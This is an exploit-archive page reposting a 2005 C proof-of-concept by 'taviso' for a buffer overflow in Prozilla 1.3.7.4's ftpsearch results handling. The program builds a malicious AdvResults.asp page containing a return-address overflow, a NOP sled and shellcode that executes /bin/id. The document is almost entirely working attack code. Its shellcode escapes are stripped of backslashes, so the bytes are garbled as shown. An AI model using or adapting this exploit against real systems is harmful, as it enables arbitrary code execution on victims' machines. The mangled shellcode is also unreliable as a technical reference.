Prozilla <= 1.3.7.4 (ftpsearch) Results Handling Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Prozilla <= 1.3.7.4 (ftpsearch) Results Handling Buffer Overflow Exploit
# Published : 2005-10-02
# Author : taviso
# Previous Title : CA iGateway (debug mode) Remote Buffer Overflow Exploit
# Next Title : GNU Mailutils imap4d 0.6 (search) Remote Format String Exploit (fbsd)

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define OVERFLOW (1<<10)+32
#define SLEDSIZ (1<<10)
#define RETADDR 0x806977a+SLEDSIZ/2
#define OUTPUT "AdvResults.asp"

/*
* prozilla bug, found while auditing for gentoo bug #70090 
* -taviso@gentoo.org
*/

/* execve() /bin/id */
unsigned char shellcode[] =
"x33xc9x83xe9xf5xd9xeexd9x74x24xf4x5bx81x73x13x7e"
"x02xadx8ex83xebxfcxe2xf4x14x09xf5x17x2cx64xc5xa3"
"x1dx8bx4axe6x51x71xc5x8ex16x2dxcfxe7x10x8bx4exdc"
"x96x0axadx8ex7ex2dxcfxe7x10x2dxc4xeax7ex55xfex07"
"x9fxcfx2dx8e";

int main(int argc, char **argv)
{
unsigned char *buf;
void *ret = (void *) RETADDR;
FILE *exploit;
int i;

exploit = fopen(OUTPUT, "w");
fprintf(exploit, "<PRE><A HREF=>");

buf = malloc(OVERFLOW);
for (i = 0; buf + i < buf + OVERFLOW; i += sizeof(void *))
memcpy(buf + i, &ret, sizeof(void *));
fwrite(buf, OVERFLOW, 1, exploit);
fprintf(exploit, "</A><A HREF=></A><A HREF=></A></PRE>");
buf = realloc(buf, SLEDSIZ + sizeof(shellcode));
memset(buf, 0x90, SLEDSIZ);
memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode));
fwrite(buf, SLEDSIZ + sizeof(shellcode), 1, exploit);
free(buf);
fprintf(stderr, "[*] %s created.n", OUTPUT);
return 0;
}

// www.Syue.com [2005-10-02]